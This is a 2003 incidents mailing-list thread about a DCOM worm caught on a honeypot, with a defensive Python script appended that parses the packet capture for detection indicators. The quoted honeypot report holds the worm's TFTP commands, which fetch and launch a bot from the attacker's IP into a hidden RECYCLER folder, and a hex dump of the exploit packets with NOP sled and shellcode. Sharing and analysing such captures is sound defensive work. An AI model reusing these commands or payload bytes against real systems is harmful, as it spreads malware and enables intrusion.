RE: DCOM worm with get.bat bot.rar
From: Peter Ellison (p.pe_at_btopenworld.com)
Date: 08/20/03
- Previous message: James C. Slora Jr.: "Re: Anyone else seeing a radical increase in Sobig?"
- In reply to: Jeremiah Cornelius: "Re: DCOM worm with get.bat bot.rar"
To: <incidents@securityfocus.com>
Date: Wed, 20 Aug 2003 13:55:27 +0100
This IP range is dynamically applied at login time; why the perp hardwired
his/her "project", your guess is as good as mine. From personal dealings with
this ISP, allocation of IPs is not as dynamic as it's supposed to be. The
record for me so far is 6 weeks without a change!
-----Original Message-----
From: Jeremiah Cornelius [mailto:jeremiah@nur.net]
Sent: 19 August 2003 18:35
To: incidents@securityfocus.com
Subject: Re: DCOM worm with get.bat bot.rar
The address is an NTL IP in North UK. Likely a DSL there. Looks like it's
been unplugged, or DoS'd by tftp!
----- Original Message -----
From: "Andrej" <laj@swordlord.com>
To: <incidents@securityfocus.com>
Sent: Tuesday, August 19, 2003 2:05 AM
Subject: DCOM worm with get.bat bot.rar
> I just got a new DCOM worm on our honeypot. After the exploit on port 135
> (dump below) a connection was built on port 4444:
> TFTP -i 81.103.7.66 GET get.bat
> get.bat
> exit
> I was able to get the get.bat; it's:
> mkdir C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
> TFTP -i 81.103.7.66 GET bot.rar
> TFTP -i 81.103.7.66 GET unrar.bat
> TFTP -i 81.103.7.66 GET unrar.exe
> start unrar.bat
> exit
> Unfortunately I was not able to download the bot.rar for inspection because
> the connection timed out. Maybe somebody else is more successful.
>
> cheers
> andrej
>
>
>
> [2003-08-19 10:37:34]
> IPv4: 81.103.7.66 -> *
> hlen=5 TOS=0 dlen=1500 ID=48197 flags=0 offset=0 TTL=114
> chksum=43601
> TCP: port=1176 -> dport: 135 flags=***A**** seq=2683878707
> ack=1434085177 off=5 res=0 win=64240 urp=0 chksum=61593
> Payload: length = 1460
>
> 000 : 05 00 00 03 10 00 00 00 A8 06 00 00 E5 00 00 00 ................
> 010 : 90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00 ................
> 020 : 00 00 00 00 32 24 58 FD CC 45 64 49 B0 70 DD AE ....2$X..EdI.p..
> 030 : 74 2C 96 D2 60 5E 0D 00 01 00 00 00 00 00 00 00 t,..`^..........
> 040 : 70 5E 0D 00 02 00 00 00 7C 5E 0D 00 00 00 00 00 p^......|^......
> 050 : 10 00 00 00 80 96 F1 F1 2A 4D CE 11 A6 6A 00 20 ........*M...j.
> 060 : AF 6E 72 F4 0C 00 00 00 4D 41 52 42 01 00 00 00 .nr.....MARB....
> 070 : 00 00 00 00 0D F0 AD BA 00 00 00 00 A8 F4 0B 00 ................
> 080 : 20 06 00 00 20 06 00 00 4D 45 4F 57 04 00 00 00 ... ...MEOW....
> 090 : A2 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
> 0a0 : 38 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 8..............F
> 0b0 : 00 00 00 00 F0 05 00 00 E8 05 00 00 00 00 00 00 ................
> 0c0 : 01 10 08 00 CC CC CC CC C8 00 00 00 4D 45 4F 57 ............MEOW
> 0d0 : E8 05 00 00 D8 00 00 00 00 00 00 00 02 00 00 00 ................
> 0e0 : 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 0f0 : 00 00 00 00 C4 28 CD 00 64 29 CD 00 00 00 00 00 .....(..d)......
> 100 : 07 00 00 00 B9 01 00 00 00 00 00 00 C0 00 00 00 ................
> 110 : 00 00 00 46 AB 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 120 : 00 00 00 46 A5 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 130 : 00 00 00 46 A6 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 140 : 00 00 00 46 A4 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 150 : 00 00 00 46 AD 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 160 : 00 00 00 46 AA 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 170 : 00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00 ...F....`...X...
> 180 : 90 00 00 00 40 00 00 00 20 00 00 00 38 03 00 00 ....@... ...8...
> 190 : 30 00 00 00 01 00 00 00 01 10 08 00 CC CC CC CC 0...............
> 1a0 : 50 00 00 00 4F B6 88 20 FF FF FF FF 00 00 00 00 P...O.. ........
> 1b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 1c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 1d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 1e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 1f0 : 00 00 00 00 00 00 00 00 01 10 08 00 CC CC CC CC ................
> 200 : 48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00 H.....f.........
> 210 : C0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00 .......F........
> 220 : 00 00 00 00 01 00 00 00 00 00 00 00 78 19 0C 00 ............x...
> 230 : 58 00 00 00 05 00 06 00 01 00 00 00 70 D8 98 93 X...........p...
> 240 : 98 4F D2 11 A9 3D BE 57 B2 00 00 00 32 00 31 00 .O...=.W....2.1.
> 250 : 01 10 08 00 CC CC CC CC 80 00 00 00 0D F0 AD BA ................
> 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 270 : 18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00 .C......`...`...
> 280 : 4D 45 4F 57 04 00 00 00 C0 01 00 00 00 00 00 00 MEOW............
> 290 : C0 00 00 00 00 00 00 46 3B 03 00 00 00 00 00 00 .......F;.......
> 2a0 : C0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00 .......F....0...
> 2b0 : 01 00 01 00 81 C5 17 03 80 0E E9 4A 99 99 F1 8A ...........J....
> 2c0 : 50 6F 7A 85 02 00 00 00 00 00 00 00 00 00 00 00 Poz.............
> 2d0 : 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ................
> 2e0 : 01 10 08 00 CC CC CC CC 30 00 00 00 78 00 6E 00 ........0...x.n.
> 2f0 : 00 00 00 00 D8 DA 0D 00 00 00 00 00 00 00 00 00 ................
> 300 : 20 2F 0C 00 00 00 00 00 00 00 00 00 03 00 00 00 /..............
> 310 : 00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00 ........F.X.....
> 320 : 01 10 08 00 CC CC CC CC 10 00 00 00 30 00 2E 00 ............0...
> 330 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 340 : 01 10 08 00 CC CC CC CC 68 00 00 00 0E 00 FF FF ........h.......
> 350 : 68 8B 0B 00 02 00 00 00 00 00 00 00 00 00 00 00 h...............
> 360 : 86 01 00 00 00 00 00 00 86 01 00 00 5C 00 5C 00 ............\.\.
> 370 : 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 58 00 F.X.N.B.F.X.F.X.
> 380 : 4E 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 N.B.F.X.F.X.F.X.
> 390 : 46 00 58 00 9D 13 00 01 CC E0 FD 7F CC E0 FD 7F F.X...........
> 3a0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 3b0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 3c0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 3d0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 3e0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 3f0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 400 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 410 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 420 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 430 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 440 : 90 90 90 90 90 90 90 EB 19 5E 31 C9 81 E9 89 FF .........^1.....
> 450 : FF FF 81 36 80 BF 32 94 81 EE FC FF FF FF E2 F2 ...6..2.........
> 460 : EB 05 E8 E2 FF FF FF 03 53 06 1F 74 57 75 95 80 ........S..tWu..
> 470 : BF BB 92 7F 89 5A 1A CE B1 DE 7C E1 BE 32 94 09 ....Z....|..2..
> 480 : F9 3A 6B B6 D7 9F 4D 85 71 DA C6 81 BF 32 1D C6 .:k...M.q....2..
> 490 : B3 5A F8 EC BF 32 FC B3 8D 1C F0 E8 C8 41 A6 DF .Z...2.......A..
> 4a0 : EB CD C2 88 36 74 90 7F 89 5A E6 7E 0C 24 7C AD ....6t..Z.~.$|.
> 4b0 : BE 32 94 09 F9 22 6B B6 D7 4C 4C 62 CC DA 8A 81 .2..."k..LLb....
> 4c0 : BF 32 1D C6 AB CD E2 84 D7 F9 79 7C 84 DA 9A 81 .2........y|....
> 4d0 : BF 32 1D C6 A7 CD E2 84 D7 EB 9D 75 12 DA 6A 80 .2.........u..j.
> 4e0 : BF 32 1D C6 A3 CD E2 84 D7 96 8E F0 78 DA 7A 80 .2..........x.z.
> 4f0 : BF 32 1D C6 9F CD E2 84 D7 96 39 AE 56 DA 4A 80 .2........9.V.J.
> 500 : BF 32 1D C6 9B CD E2 84 D7 D7 DD 06 F6 DA 5A 80 .2............Z.
> 510 : BF 32 1D C6 97 CD E2 84 D7 D5 ED 46 C6 DA 2A 80 .2.........F..*.
> 520 : BF 32 1D C6 93 01 6B 01 53 A2 95 80 BF 66 FC 81 .2....k.S....f..
> 530 : BE 32 94 7F E9 2A C4 D0 EF 62 D4 D0 FF 62 6B D6 .2..*...b...bk.
> 540 : A3 B9 4C D7 E8 5A 96 80 AE 6E 1F 4C D5 24 C5 D3 ..L..Z...n.L.$..
> 550 : 40 64 B4 D7 EC CD C2 A4 E8 63 C7 7F E9 1A 1F 50 @d.......c....P
> 560 : D7 57 EC E5 BF 5A F7 ED DB 1C 1D E6 8F B1 78 D4 .W...Z........x.
> 570 : 32 0E B0 B3 7F 01 5D 03 7E 27 3F 62 42 F4 D0 A4 2....].~'?bB...
> 580 : AF 76 6A C4 9B 0F 1D D4 9B 7A 1D D4 9B 7E 1D D4 .vj......z...~..
> 590 : 9B 62 19 C4 9B 22 C0 D0 EE 63 C5 EA BE 63 C5 7F .b..."...c...c.
> 5a0 : C9 02 C5 7F E9 22 1F 4C D5 CD 6B B1 40 64 98 0B ....".L..k.@d..
> 5b0 : 77 65 6B D6 wek.
>
>
> [2003-08-19 10:37:34]
> IPv4: 81.103.7.66 -> *
> hlen=5 TOS=0 dlen=284 ID=48198 flags=0 offset=0 TTL=114
> chksum=44816
> TCP: port=1176 -> dport: 135 flags=***AP*** seq=2683880167
> ack=1434085177 off=5 res=0 win=64240 urp=0 chksum=21751
> Payload: length = 244
>
> 000 : 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C .....d.!.2..:...
> 010 : 34 72 98 0B CF 2E 39 0B D7 3A 7F 89 34 72 A0 0B 4r....9..:.4r..
> 020 : 17 8A 94 80 BF B9 51 DE E2 F0 90 80 EC 67 C2 D7 ......Q......g..
> 030 : 34 5E B0 98 34 77 A8 0B EB 37 EC 83 6A B9 DE 98 4^..4w...7..j...
> 040 : 34 68 B4 83 62 D1 A6 C9 34 06 1F 83 4A 01 6B 7C 4h..b...4...J.k|
> 050 : 8C F2 38 BA 7B 46 93 41 70 3F 97 78 54 C0 AF FC ..8.{F.Ap?.xT...
> 060 : 9B 26 E1 61 34 68 B0 83 62 54 1F 8C F4 B9 CE 9C .&.a4h..bT......
> 070 : BC EF 1F 84 34 31 51 6B BD 01 54 0B 6A 6D CA DD ....41Qk..T.jm..
> 080 : E4 F0 90 80 2F A2 04 00 5C 00 43 00 24 00 5C 00 ..../...\.C.$.\.
> 090 : 31 00 32 00 33 00 34 00 35 00 36 00 31 00 31 00 1.2.3.4.5.6.1.1.
> 0a0 : 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1.1.1.1.1.
> 0b0 : 31 00 31 00 31 00 31 00 31 00 2E 00 64 00 6F 00 1.1.1.1.1...d.o.
> 0c0 : 63 00 00 00 01 10 08 00 CC CC CC CC 20 00 00 00 c........... ...
> 0d0 : 30 00 2D 00 00 00 00 00 88 2A 0C 00 02 00 00 00 0.-......*......
> 0e0 : 01 00 00 00 28 8C 0C 00 01 00 00 00 07 00 00 00 ....(...........
> 0f0 : 00 00 00 00 ....
>
> ---------------------------------------------------------------------------
> Captus Networks - Integrated Intrusion Prevention and Traffic Shaping
> - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
> - Automatically Control P2P, IM and Spam Traffic
> - Ensure Reliable Performance of Mission Critical Applications
> - Precisely Define and Implement Network Security and Performance Policies
> **FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo
> Visit us at:
> http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814
> ---------------------------------------------------------------------------
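As an added example, not part of this thread and not any poster's code: a small Python triage script for the honeypot dump format Andrej posted. It rebuilds bytes from the `OFF : hex ... ascii` lines, decodes the DCERPC request header (version 5, packet type 0 = request, frag_len 0x06A8 = 1704, opnum 4), and shows two things a defender wants from this capture: the PDU's frag_len is larger than the first 1460-byte TCP segment and only completes with the 244-byte second packet (1460 + 244 = 1704), so a per-packet signature never sees the `\C$\...doc` tail; and the UTF-16LE server name after `\\` is not NUL-terminated but runs straight into non-text bytes before the 0x90 sled. The `DUMP_1`/`DUMP_2` strings are a copied subset of the two packets above (unlisted offsets are zero-filled), `CAPTURED_LENGTHS` comes from the two `Payload: length` headers, and the sled threshold in `assess` is my assumption, not a vendor signature.

```python
"""Triage helper for a DCERPC request captured in the "OFF : hex ... ascii" dump
format used in the post (added example, not any poster's code). DUMP_1/DUMP_2 are
subsets of the two packets; unlisted offsets are zero-filled, so sizes reflect the subset."""
import re
import struct

HEX_LINE = re.compile(r"^\s*([0-9A-Fa-f]+)\s*:\s*(.*)$")
HEX_PAIR = re.compile(r"^[0-9A-Fa-f]{2}$")
PTYPE_NAMES = {0: "request", 2: "response", 3: "fault", 11: "bind", 12: "bind_ack"}

# Packet 1 (captured payload 1460 bytes): DCERPC header, UNC server name, part of
# the 0x90 sled, first shellcode bytes. Packet 2 (244 bytes): tail of the same PDU.
DUMP_1 = r"""
000 : 05 00 00 03 10 00 00 00 A8 06 00 00 E5 00 00 00 ................
010 : 90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00 ................
360 : 86 01 00 00 00 00 00 00 86 01 00 00 5C 00 5C 00 ............\.\.
370 : 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 58 00 F.X.N.B.F.X.F.X.
380 : 4E 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 N.B.F.X.F.X.F.X.
390 : 46 00 58 00 9D 13 00 01 CC E0 FD 7F CC E0 FD 7F F.X...........
3a0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
3b0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
440 : 90 90 90 90 90 90 90 EB 19 5E 31 C9 81 E9 89 FF .........^1.....
"""
DUMP_2 = r"""
080 : E4 F0 90 80 2F A2 04 00 5C 00 43 00 24 00 5C 00 ..../...\.C.$.\.
090 : 31 00 32 00 33 00 34 00 35 00 36 00 31 00 31 00 1.2.3.4.5.6.1.1.
0a0 : 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1.1.1.1.1.
0b0 : 31 00 31 00 31 00 31 00 31 00 2E 00 64 00 6F 00 1.1.1.1.1...d.o.
0c0 : 63 00 00 00 01 10 08 00 CC CC CC CC 20 00 00 00 c........... ...
"""
CAPTURED_LENGTHS = [1460, 244]  # "Payload: length = ..." of the two captures

def parse_hexdump(text):
    """Rebuild bytes from 'OFF : B0 B1 ... ASCII' lines; unlisted offsets stay 0x00.
    The ASCII column is skipped: stop after 16 pairs or at the first non-hex token."""
    chunks = {}
    for line in text.splitlines():
        m = HEX_LINE.match(line)
        if not m:
            continue
        data = bytearray()
        for tok in m.group(2).split():
            if len(data) == 16 or not HEX_PAIR.match(tok):
                break
            data.append(int(tok, 16))
        chunks[int(m.group(1), 16)] = bytes(data)
    buf = bytearray(max((off + len(d) for off, d in chunks.items()), default=0))
    for off, d in chunks.items():
        buf[off:off + len(d)] = d
    return bytes(buf)

def parse_dcerpc_request(pdu):
    """Decode the 24-byte connection-oriented DCERPC request header (little-endian drep)."""
    frag_len, auth_len, call_id = struct.unpack_from("<HHI", pdu, 8)
    alloc_hint, context_id, opnum = struct.unpack_from("<IHH", pdu, 16)
    return {"version": pdu[0], "ptype": pdu[2], "ptype_name": PTYPE_NAMES.get(pdu[2], "other"),
            "flags": pdu[3], "frag_len": frag_len, "auth_len": auth_len, "call_id": call_id,
            "alloc_hint": alloc_hint, "context_id": context_id, "opnum": opnum}

def longest_run(buf, value=0x90):
    """Length of the longest run of `value` bytes (NOP-sled size estimate)."""
    best = cur = 0
    for b in buf:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best

def utf16le_strings(buf, min_len=4):
    """Like `strings -el`: (offset, text, terminating code unit) for each printable run."""
    runs, i = [], 0
    while i + 1 < len(buf):
        start, chars = i, []
        while i + 1 < len(buf) and 0x20 <= (buf[i] | (buf[i + 1] << 8)) < 0x7F:
            chars.append(chr(buf[i]))
            i += 2
        if len(chars) >= min_len:
            term = (buf[i] | (buf[i + 1] << 8)) if i + 1 < len(buf) else None
            runs.append((start, "".join(chars), term))
        if i == start:
            i += 1
    return runs

def assess(first_pdu, captured_lengths, sled_threshold=16):
    """Indicators a defender wants from this capture (threshold is an assumption)."""
    hdr = parse_dcerpc_request(first_pdu)
    # A UNC path should be one NUL-terminated string; here the server name after
    # "\\" is cut off by non-text code units (the bytes right before the sled).
    bad_unc = [s for _, s, term in utf16le_strings(first_pdu)
               if s.startswith("\\\\") and term not in (0, None)]
    sled = longest_run(first_pdu)
    # frag_len beyond the first TCP segment: a per-packet signature never sees
    # the rest of the PDU (here the "\C$\...doc" tail that arrives in packet 2).
    return {"header": hdr, "nop_sled": sled, "unc_without_nul": bad_unc,
            "spans_segments": hdr["frag_len"] > captured_lengths[0],
            "pdu_complete": sum(captured_lengths) == hdr["frag_len"],
            "suspicious": sled >= sled_threshold or bool(bad_unc)}

PDU_1 = parse_hexdump(DUMP_1)
PDU_2 = parse_hexdump(DUMP_2)
```

Feed `parse_hexdump` the full dump text from a capture rather than the subset here, then `assess(pdu, [segment lengths])`; `utf16le_strings(PDU_2)` is what recovers the `\C$\1234561111...doc` filename from the second segment, which is the part a single-packet rule would have missed.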